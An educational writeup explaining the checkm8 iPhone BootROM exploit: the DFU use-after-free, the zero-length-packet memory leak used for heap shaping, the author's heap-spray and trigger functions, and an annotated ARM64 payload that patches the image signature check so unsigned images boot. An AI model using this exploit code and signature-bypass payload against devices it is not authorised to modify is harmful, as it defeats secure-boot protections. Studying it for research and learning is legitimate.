Deep Dive

What We’re Looking At

This writeup walks through my journey learning about checkm8, one of the biggest BootROM exploits ever found. My goal was simple: understand how this exploit works well enough to build my own version from scratch.

The checkm8 exploit uses two different bugs together:

  • A use after free bug (stayed in the code until the A14 chip)
  • A memory leak bug (Apple fixed this starting with A12)

Here’s the important part: you need both bugs working together to make this exploit work. The memory leak isn’t just helpful, it’s totally needed to use the use after free bug. This is why A12 and A13 devices, even though they have the use after free bug, can’t be exploited by checkm8. Apple fixed the memory leak, which blocked the whole attack.

Helpful Resources

Before we start, check out these resources that helped me learn:

Quick Note

For legal reasons, all code examples in this writeup come from pseudocode that shows how things work. You can also find these same functions in leaked iBoot/BootROM source code. I’ve cleaned up these examples by removing extra code and renaming variables to make them easier to read. This includes checks and safety features that don’t matter for understanding. Function names stay the same as the original code though.

Setting Things Up: USB Starts

The USB system starts through usb_init(), which then calls usb_dfu_init(). This setup does several important things: it creates a DFU interface to handle USB communications and sets up a global input/output buffer for data transfers.

int usb_dfu_init()
{   
  // Create and clear the global IO buffer
  // 0x800 byte buffer aligned to 0x40 bytes
  io_buffer = memalign(0x800, 0x40);
  bzero(io_buffer, 0x800);

  // Set up global state variables
  completionStatus = -1;
  totalReceived = 0;
  dfuDone = false;

  // Create the USB interface
  // ... //

  return 0;
}

What to remember from this:

  • The global IO buffer gets created to hold incoming USB data
  • bzero() fills this whole buffer with zeros for a clean start
  • State tracking variables are set to starting values
  • A global USB interface is set up and ready

How USB Transfers Work

When Requests Come In

When DFU gets a USB control transfer, the system calls usb_core_handle_usb_control_receive(). This function finds the right DFU interface handler and sends it to handle_interface_request(). Let’s look at what happens when the host sends data to the device:

For download operations (which are really important for understanding this bug), the function gives back one of three possible results:

  • 0 means transfer finished successfully
  • -1 means the requested wLength is bigger than the IO buffer can hold
  • wLength value means device is ready to receive exactly wLength bytes
    int handle_interface_request(struct usb_device_request *request, uint8_t **out_buffer)
    {
    int ret = -1;
    
    // Check if this is host to device transfer
    if ((request->bmRequestType & 0x80) == 0)
    {
      switch(request->bRequest)
      {
        case 1: // DFU_DNLOAD
        {
          if(wLength > sizeof(*io_buffer)) {
            return -1;
          }
    
          *out_buffer = (uint8_t *)io_buffer; // Point to IO buffer
          expecting = wLength;
          ret = wLength;
          break;
        }
    
        case 4: // DFU_CLR_STATUS
        case 6: // DFU_ABORT
        {
          totalReceived = 0;
    
          if(!dfuDone) {
            // Update globals to stop DFU
            completionStatus = -1;
            dfuDone = true;
          }
    
          ret = 0;
          break;
        }
      }
      return ret;
    }
    return -1;
    }
    

Pay attention to these important details:

  • The out_buffer parameter gets updated to point to the global IO buffer
  • The function returns wLength (after checking it) to show expected data length

Back in usb_core_handle_usb_control_receive(), this return value decides what to do next:

int ret = registeredInterfaces[interfaceNumber]->handleRequest(&setupRequest, &ep0DataPhaseBuffer);

// Host to device transfer
if((setupRequest.bmRequestType & 0x80) == 0) {

  // Handler returned wLength, get ready for data
  if (ret > 0) {
    ep0DataPhaseLength = ret;
    ep0DataPhaseInterfaceNumber = interfaceNumber;
    // Begin data phase
  }

  // Handler returned 0, transfer complete
  else if (ret == 0) {
    usb_core_send_zlp();
    // Begin data phase
  }
}

// Device to host transfer
else if((setupRequest.bmRequestType & 0x80) == 0x80) {
    // Begin data phase
}

When handle_interface_request() returns a positive value, the system updates the global variable tracking expected data length. Notice that ep0DataPhaseBuffer now points to the global IO buffer, ready for the data phase.

Moving Data

After the setup phase finishes, the data phase begins. Here’s the important part of handle_ep0_data_phase() that handles incoming data:

void handle_ep0_data_phase(u_int8_t *rxBuffer, u_int32_t dataReceived, bool *dataPhase)
{
  // Copy received data to data phase buffer
  // ...

  // Check if we got everything
  if(ep0DataPhaseReceived == ep0DataPhaseLength)
  { 
    // Call interface callback and send zero length packet
    // to show we're done

    goto done; // Clean up global state
  }
  return;
}

Once all data arrives, the IO buffer contents get copied to an image buffer for loading later. Then this cleanup code runs:

done:
  ep0DataPhaseReceived = 0;
  ep0DataPhaseLength = 0; 
  ep0DataPhaseBuffer = NULL;
  ep0DataPhaseInterfaceNumber = -2;

Let me sum up this whole process:

  • During DFU setup, the IO buffer is created and cleared
  • For data transfers, the global buffer pointer is set to the IO buffer
  • USB data goes directly into the IO buffer
  • After image transfer finishes, IO buffer contents move to an image buffer
  • Global state gets reset, getting ready for the next image transfer

The Main Bug: Use After Free

How Images Move Through The System

When DFU mode starts, the main entry point is getDFUImage(). Here are its basic operations:

int getDFUImage(void* buffer, int maxLength)
{
  // Store parameters in globals
  imageBuffer = buffer;
  imageBufferSize = maxLength;

  // Wait for DFU to finish
  while (!dfuDone) {
    event_wait(&dfuEvent);
  }

  // Shut down USB operations
  usb_quiesce();

   // return ... //
}

The function basically waits for DFU operations to finish, then shuts down the USB stack. Looking back at handle_ep0_data_phase(), we see global variables get reset after the data phase completes. But what if the data transfer never finishes? The function just returns without clearing global state. This is great for an attacker because the global variable pointing to the IO buffer stays there.

What Happens When Things Shut Down

Looking at handle_interface_request() again shows that sending a DFU_ABORT command sets dfuDone to true, stopping DFU. A USB reset does the same thing through handle_bus_reset(). In getDFUImage(), this triggers usb_quiesce() to tear down the USB stack:

void usb_quiesce()
{
  usb_core_stop();
  usb_free();
  usb_inited = false;
}

The usb_free() function calls usb_dfu_exit(), which has this important code:

if (io_buffer) {
  free(io_buffer);
  io_buffer = NULL;
}

Following what happens, we find:

  • Incomplete data phase means global variables stay there
  • DFU_ABORT command sets dfuDone to true
  • This triggers usb_quiesce() which frees the IO buffer
  • getDFUImage() returns and gets called again when DFU restarts
  • Global variables don’t get reset when restarting
  • The global variable pointing to the IO buffer is still there, but now points to freed memory

This is our use after free bug, the exact bug used by checkm8. Next, I’ll explain how to use this bug to run code. But first, we need a memory leak.

If you’re paying close attention, you might notice that sending another DFU_DNLOAD request after triggering the use after free would just reset the global variables. We work around this by not sending any requests that would do that between triggering the bug and sending our overwrite. Once our overwrite is at the start of the freed buffer, we can send the payload (using DFU_DNLOAD) to the new IO buffer, and the overwrite will send execution to our payload. I’ll explain this better later.

The Other Bug We Need: Memory Leak

Why We Need This

The SecureROM is really predictable. The IO buffer usually gets created at roughly the same heap location each time the USB stack starts. But exploiting the use after free needs DFU to restart and call getDFUImage() again, creating a problem: the newly created IO buffer would normally just overwrite the freed buffer, making our bug useless.

This is where the memory leak comes in. It’s our way to trick the heap allocator into putting the new IO buffer somewhere else on the heap. This leak being missing on A12 and A13 is why checkm8 doesn’t work on those devices. They have the use after free bug and it can be triggered, but there’s no way to stop the IO buffer from being put over the freed one.

For context: a memory leak happens when memory gets allocated but doesn’t get properly freed, leaving memory allocated but impossible to access.

Looking At USB Request Structures

Here’s the usb_device_io_request structure (I’ll call it io_request to keep it simple):

struct usb_device_io_request
{
    u_int32_t                       endpoint;
    volatile u_int8_t               *io_buffer;
    int                             status;
    u_int32_t                       io_length;
    u_int32_t                       return_count;
    void (*callback) (struct usb_device_io_request *io_request);
    struct usb_device_io_request    *next;
};

Two fields matter for understanding the memory leak: callback points to a function that gets called when the request finishes, and next points to the next io_request in the linked list.

Where The Bug Lives

Stalling the device to host pipe stops it from processing requests while stalled. During this stalled time, you can trigger lots of allocations by sending many requests. Each request gets its io_request structure created and added to the endpoint’s linked list. When you unstall the pipe, all these requests get freed. This gives us the ability to allocate objects and delay when they get freed on the heap.

But these allocations won’t stay around through USB stack shutdown. For that, we need a memory leak where certain requests never get properly freed.

The leak exists in the standard callback for io_request objects. The device tries to send a zero length packet if, and only if, three things are true: the request length is more than zero and is an exact multiple of packet size (0x40) and the host requested more bytes than this length.

void standard_device_request_cb (struct usb_device_io_request *request)
{
  if ((request->io_length > 0)
  && ((request->io_length % 0x40) == 0)
  && (setup_request.wLength > request->io_length)) { 
    usb_core_send_zlp();
  }
}

When a USB reset or DFU abort triggers USB stack shutdown, the device first stops all endpoints, then runs bzero() on the whole endpoint structure array. During shutdown, all waiting requests are processed as failed, which triggers their callbacks. The problem: these extra zero length packets never get sent during shutdown, so they leak.

Stalling the pipe and sending lots of requests creates a buildup of allocations. Triggering a USB reset runs these request callbacks, which queue extra zero length packets that leak.

On A12+ devices, when a USB reset happens, the following abort also stops EP0_IN for each setup packet, so abort() gets called twice. The first abort queues an extra zero length packet, but the second successfully cleans it up. Only after this does bzero() happen.

There’s a second bug that helps the leak. Inside standard_device_request_cb(), the current setup packet’s wLength is checked against the request’s io_length. But the function doesn’t account for the setup packet possibly being overwritten by a new one before the check happens. During heap spray, we cause lots of allocations, but send a final request with the biggest wLength of all, so the callback checks this request’s wLength during each callback when the USB stack shuts down.

When the host receives a packet smaller than 0x40 bytes (since transfers split into 0x40 byte chunks), the transfer is done. So for transfer lengths that are exact multiples of 0x40, a zero length packet must signal that the transfer ended.

The callbacks run during USB stack shutdown could queue zero length packet requests that then leak. These are perfect for shaping the heap. Because of how the heap allocator works, if the IO buffer is 0x800 bytes and two allocations are leaked exactly 0x800 bytes apart, the space between them becomes the preferred spot for the next 0x800 byte allocation (the IO buffer when DFU restarts). The heap allocator picks the smallest possible space for allocation, and the space between leaked allocations will be the perfect size.

Making It Work

To trigger the use after free with an incomplete data phase, you have to go beyond normal USB transfer rules defined in the USB spec. The open source community has used two approaches: first, using microcontrollers (Arduino + USB Host Controller) for maximum control over the host USB stack, letting you control exactly what gets sent and when; second, forcing transfer cancellation midway through, as done in ipwndfu and gaster (among others) using really short timeouts on async transfers.

Exploitation happens in three stages:

  1. Setting up the heap (heap feng shui)
  2. Triggering the use after free bug
  3. Sending and running the payload

The next sections have code examples from my Achilles project, heavily based on gaster’s implementation. Note that this is simplified for the T8011 SoC. Certain exploit parts are different across different SoCs.

Setting Up The Heap

Heap feng shui means purposely changing the heap layout to help exploitation. Using the memory leak we talked about earlier, we can trick the heap allocator into putting the IO buffer at a different location when restarting, letting us access the freed buffer from the previous DFU run.

To create the hole for the next IO buffer, we should:

  1. Stall the device to host endpoint
  2. Send lots of requests to create a buildup of allocations
  3. Have the first and last requests meet requirements for sending an extra zero length packet
  4. Trigger a USB reset so usb_quiesce() is called and these requests leak
  5. Leave ourselves with a hole controlling next IO buffer allocation

Since all heap allocations round up to the nearest 0x40 multiple, and each packet has a 0x40 byte header, we can safely assume each io_request object takes 0x80 bytes on the heap. One strategy would be sending 0x10 non leaking packets to create an 0x800 byte hole, exactly the IO buffer size. Testing proved this worked, but it’s not what we chose.

A faster, simpler strategy (used in most implementations) sends the bare minimum packets such that a hole is created smaller than 0x800, but big enough that allocations shuffle around enough for the IO buffer to be allocated somewhere else when restarting. This is the strategy in the function below, adapted for T8011 BootROM:

bool checkm8HeapSpray(device_t *device)
{
    checkm8Stall(device)
    for (int i = 1; i <= config.hole; i++)
    {
        checkm8NoLeak(device)
    }
    checkm8USBRequestLeak(device)
    checkm8NoLeak(device)
    return true;
}

Walking through step by step:

checkm8Stall(device)

This stalls the device to host endpoint, letting lots of io_request structures be created as requests pile up unprocessed during the stalled state. Also, this request leaks a zero length packet, matching the callback function’s requirements for sending an extra zero length packet.

for (int i = 1; i <= config.hole; i++)
{
    checkm8NoLeak(device)
}

This sends config.hole requests to the device, each getting an io_request structure created. These requests won’t leak zero length packets since they don’t meet the callback function’s requirements. This creates a ‘hole’ that will be properly freed when the USB stack stops.

checkm8USBRequestLeak(device)

This leaks an extra zero length packet, giving us our needed hole. Since we sent a zero length packet at the function’s start, current allocations look like this:

[  Leaked packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Normal packet  ]
[  Leaked packet  ]

After USB stack reset, it becomes:

[ Allocated space ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[   Empty space   ]
[ Allocated space ]

The heap allocator then puts objects inside this hole enough to shuffle other allocations, making the IO buffer get allocated somewhere else when restarting.

checkm8NoLeak(device)

This sends a request that doesn’t leak a zero length packet, getting freed when the USB stack stops. The checkm8NoLeak() transfer has a wLength of 0xC1, the highest of all heap feng shui transfers. This makes sure the host requests more bytes in the setup packet, meeting conditions for extra zero length packets to be sent and leaked.

At this point, the heap is shaped so the next IO buffer gets put at a different location than the standard address, which is taken by the freed buffer. If the new IO buffer got put in the same place, we couldn’t exploit the use after free since the freed buffer would be overwritten.

Triggering The Bug

With the new IO buffer hopefully put somewhere else on the heap (thanks to our heap feng shui), we can now trigger the main use after free bug.

  1. Send a setup packet with request type where bmRequestType & 0x80 == 0 (we’ll use 0x21), a DFU_DNLOAD request, and a wLength less than or equal to 0x800. This sets all global variables to needed values.
  2. Begin the data phase but leave it incomplete to avoid clearing global state.
  3. Send a DFU_ABORT request to free the IO buffer and trigger DFU restart. This activates the use after free.

Here’s my function triggering the use after free:

bool checkm8TriggerUaF(device_t *device)
{
  unsigned usbAbortTimeout = 10;
  transfer_ret_t transferRet;

  while(sendUSBControlRequestAsyncNoData(&device->handle, 0x21, DFU_DNLOAD, 0, 0, 0x800, usbAbortTimeout, &transferRet)) {
    if(transferRet.sz < config.overwritePadding 
    && sendUSBControlRequestNoData(&device->handle, 0, 0, 0, 0, config.overwritePadding - transferRet.sz, &transferRet) 
    && transferRet.ret == USB_TRANSFER_STALL) {
      sendUSBControlRequestNoData(&device->handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL);
      return true;
    }
    if(!sendUSBControlRequestNoData(&device->handle, 0x21, DFU_DNLOAD, 0, 0, EP0_MAX_PACKET_SIZE, NULL)) {
      break;
    }
    usbAbortTimeout = (usbAbortTimeout + 1) % 10;
  }
  return false;
}

First, let’s look at the while loop:

while(sendUSBControlRequestAsyncNoData(&device->handle, 0x21, DFU_DNLOAD, 0, 0, 0x800, usbAbortTimeout, &transferRet)) {
  // ... //
  usbAbortTimeout = (usbAbortTimeout + 1) % 10;
}

We’re sending the needed packet to set global variables, but we keep sending it async with shorter and shorter timeouts until it’s cancelled midway through. This gets the partially complete data phase state on the device.

Interestingly, we never actually send data to trigger this use after free. Sending the 0x21, DFU_DNLOAD request sets global variables and sets the global data phase variable to true.

if(transferRet.sz < config.overwritePadding 
    && sendUSBControlRequestNoData(&device->handle, 0, 0, 0, 0, config.overwritePadding - transferRet.sz, &transferRet) 
    && transferRet.ret == USB_TRANSFER_STALL) {
    sendUSBControlRequestNoData(&device->handle, 0x21, DFU_CLRSTATUS, 0, 0, 0, NULL);
    return true;
}

After sending the async request, we check if the device returned a size less than the overwrite padding. The overwrite padding makes sure our later overwrite goes to the right memory location. I won’t go too deep into this.

We then check if the device is stalled, which shows conditions are right for triggering the use after free. If so, send a DFU_CLRSTATUS to shut down the USB stack and trigger the bug.

After this, the first run’s IO buffer is freed while global variables keep their values, including the variable pointing to the old IO buffer. The new IO buffer should be put in the hole created during heap feng shui. So sending data to the device writes it to the address in the global variable pointing to the old IO buffer.

Next, we need to send our overwrite and payload to get full code execution.

Building Our Payload

The complete payload is the data we send to get full device execution as part of exploitation. It comes in two parts:

  1. The overwrite
  2. The actual payload

The overwrite is data sent to overwrite the callback and next fields of an io_request structure. This redirects execution to the main payload.

The main payload is machine code doing things like changing the USB serial number and patching signature checks to let unsigned images boot. I’m using the gaster payload found in that project and my own.

Part One: The Overwrite

For the overwrite, the callback and next fields in the io_request structure at the freed buffer’s start need overwriting. Both are pointers to memory areas. callback points to the callback function and next points to the next io_request in the waiting requests linked list.

When exploiting checkm8, overwriting the callback function lets us restore the link and FP registers, stopping the current USB request from being freed. Since we’ve overwritten heap data, trying to free the object would cause invalid heap metadata, causing issues and maybe device crashes.

For those who don’t know: the link register (LR) holds the address to jump back to after returning from a function. The frame pointer (FP) holds the current stack frame’s address, which looks like this:

Top of Stack
|  Return Address |
|  Arguments      |
| Local Variables |
| Saved Registers |
|  Frame Pointer  |
Bottom of Stack

The stack frame is the stack area currently used by the program, usually changing when functions are called or return. It holds local variables, return address, and other important program data.

But why restore these registers? Remember that when the USB stack shuts down, it processes waiting requests and usb_core_complete_endpoint_io() runs each callback function. But after doing this, this function frees the IO request object. By restoring the link and FP registers, we can have execution jump back to the function that called usb_core_complete_endpoint_io(), instead of continuing to free the IO request object.

Since callback is a pointer to a memory area, we can’t just overwrite the field with machine code to do this job. This brings us to the nop gadget used in popular checkm8 implementations, though the name isn’t really accurate. nop means “no operation,” usually code doing nothing. But in checkm8’s case, the nop gadget in BootROM code looks like this:

ldp x29, x30, [sp, #0x10]
ldp x20, x19, [sp], #0x20
ret

For context, the x29 register is the frame pointer, and x30 is the link register. It’s important to know that for ARM64, the stack usually grows downward from high to low addresses, and the stack pointer (SP) holds the lowest address taken by the stack.

Here’s what ldp x29, x30, [sp, #0x10] does:

  • ldp is the load pair instruction, loading a pair of registers from memory
  • x29, x30 is the register pair to load
  • [sp, #0x10] is the address to load registers from. sp is the stack pointer, and #0x10 is the offset. Since the stack grows downward, adding 0x10 to the stack pointer points to memory just above the stack pointer, where the link and FP registers are stored. 0x10 is the combined size of the register pair, 16 bytes, since each register is 64 bits or 8 bytes.

ldp x20, x19, [sp], #0x20 does a similar job, except it loads registers from the stack pointer without offset, then adds 0x20 (32 bytes) to the stack pointer. This is done for alignment and making sure the stack pointer points to the right address for the next instruction accessing that memory.

Finally, ret is the return instruction, returning to the address stored in the link register.

Running Our Code

With the payload in place and an io_request having its next field pointing to an address inside our payload, we can trigger a USB reset. As always, this processes the list of waiting requests (which we just created while stalled) as failed and runs the callback for each.

When it reaches our overflown io_request object, it runs the callback (just a nop gadget to restore link and FP registers) then follows the next field to arrive in our payload’s middle. It then tries to run the callback field of what it thinks is an io_request object, but actually begins running our callback chain at the address we overflowed the next field with + the offset of the callback field in the io_request structure (0x20).

Now I’ll walk through the payload explaining exactly what it does at each step.

What The Payload Does

While ARM64 assembly may seem scary, it makes sense once you understand each instruction. Here’s the _main function from the main checkm8 payload for T8011, containing another label as part of it:

_main:
  stp x29, x30, [sp, #-0x10]!
  ldr x0, =payload_dest
  ldr x2, =dfu_handle_bus_reset
  str xzr, [x2]
  ldr x2, =dfu_handle_request
  add x1, x0, #0xC
  str x1, [x2]
  adr x1, _main
  ldr x2, =payload_off
  add x1, x1, x2
  ldr x2, =payload_sz
  ldr x3, =memcpy_addr
  blr x3
  ldr x0, =gUSBSerialNumber
_find_zero_loop:
  add x0, x0, #1
  ldrb w1, [x0]
  cbnz w1, _find_zero_loop
  adr x1, PWND_STR
  ldp x2, x3, [x1]
  stp x2, x3, [x0]
  ldr x0, =gUSBSerialNumber
  ldr x1, =usb_create_string_descriptor
  blr x1
  ldr x1, =usb_serial_number_string_descriptor
  strb w0, [x1]
  mov w0, #0xD2800000
  ldr x1, =patch_addr
  str w0, [x1]
  ldp x29, x30, [sp], #0x10
  ret

PWND_STR:
.asciz " PWND:[checkm8]"

The first line stores the new link register and frame pointer, as any program would when branching to a new function. After this line, the real payload begins.

ldr x0, =payload_dest
ldr x2, =dfu_handle_bus_reset
str xzr, [x2]

This loads the payload destination address into x0, and the dfu_handle_bus_reset address into x2. dfu_handle_bus_reset is the handle_bus_reset property of the USB interface created when DFU starts, just a pointer to the handle_bus_reset() function. The value in the xzr register (the zero register) is stored to memory at the dfu_handle_bus_reset address to make sure the device doesn’t respond to USB reset and trigger USB stack shutdown again. This would cause issues because of heap state and how we’re using allocated io_request structures for the exploit.

ldr x2, =dfu_handle_request
add x1, x0, #0xC
str x1, [x2]

This loads the dfu_handle_request address (the handle_request field of the interface) into x2, then adds 0xC to the value in x0 (the payload destination) and stores the result in x1. It then stores the value in x1 to the address in x2, which is dfu_handle_request. This means when interface->handle_request() is called, it jumps to shellcode inside payload_handle_checkm8_request.S, which is gaster specific and doesn’t need detailed coverage here. TL;DR: it replaces the DFU interface’s handle_request() function with a custom one doing something different when a specific USB request is sent (0xA1, 2). Gaster uses this in the gaster_command() function for encryption/decryption operations. If this specific request isn’t used, the replacement shellcode just calls the standard handle_interface_request() function.

adr x1, _main
ldr x2, =payload_off
add x1, x1, x2
ldr x2, =payload_sz
ldr x3, =memcpy_addr
blr x3

This loads the address of _main relative to the program counter into x1, and the payload end address into x2. By adding them together and storing the result in x1, we calculate the address that is payload_off bytes from _main’s address. The payload_sz variable is loaded into x2 and the memcpy() function address into x3. Finally, blr x3 branches to the address in x3 with the link register linking back to the _main function, running memcpy().

The memcpy() parameters are: memcpy(void *dst, void *src, size_t n). So the payload destination address is stored in x0, the payload address in x1, and payload size in x2. So the memcpy() call copies the payload to the payload destination.

ldr x0, =gUSBSerialNumber

After returning from memcpy(), the gUSBSerialNumber (global USB serial number) address is loaded into x0 as the payload destination is no longer needed.

_find_zero_loop:
  add x0, x0, #1
  ldrb w1, [x0]
  cbnz w1, _find_zero_loop

This loop adds 1 to the address in x0 (gUSBSerialNumber) and loads the byte at that address into w1. If the byte isn’t zero, it branches back to _find_zero_loop and continues. This continues until the byte at the address in x0 is zero, then continues to the next instruction. It finds the serial number string’s end in memory to add PWND:[checkm8] to it.

adr x1, PWND_STR
ldp x2, x3, [x1]
stp x2, x3, [x0]

PWND_STR is loaded into x1, then the register pair x2 and x3 are loaded from the address in x1. These are stored to the address in x0, the serial number string’s end. This adds PWND:[checkm8] to the serial number string.

ldr x0, =gUSBSerialNumber
ldr x1, =usb_create_string_descriptor
blr x1

The gUSBSerialNumber start address is loaded into x0 again, and the usb_create_string_descriptor() function address into x1. By branching with a link to register x1, the device creates a new string descriptor using the serial number so it appears to the host computer with the custom serial number string.

ldr x1, =usb_serial_number_string_descriptor
strb w0, [x1]

The usb_serial_number_string_descriptor is updated with the new serial number string to reflect the payload’s changes.

mov w0, #0xD2800000
ldr x1, =patch_addr
str w0, [x1]

A value of 0xD2800000 is loaded into w0, which can be decoded to the instruction mov x0, 0. The value in patch_addr is loaded into x1, and 0xD2800000 is written to memory at the address pointed to by patch_addr. The reason: patch_addr points to an instruction inside image4_validate_property_callback(), replacing it. So if an image is found improperly signed, instead of branching to a function rejecting it, mov x0, 0 sets the return value to 0, so the device thinks it’s a validly signed image. This is the signature check patch letting untrusted image booting.

And that’s it.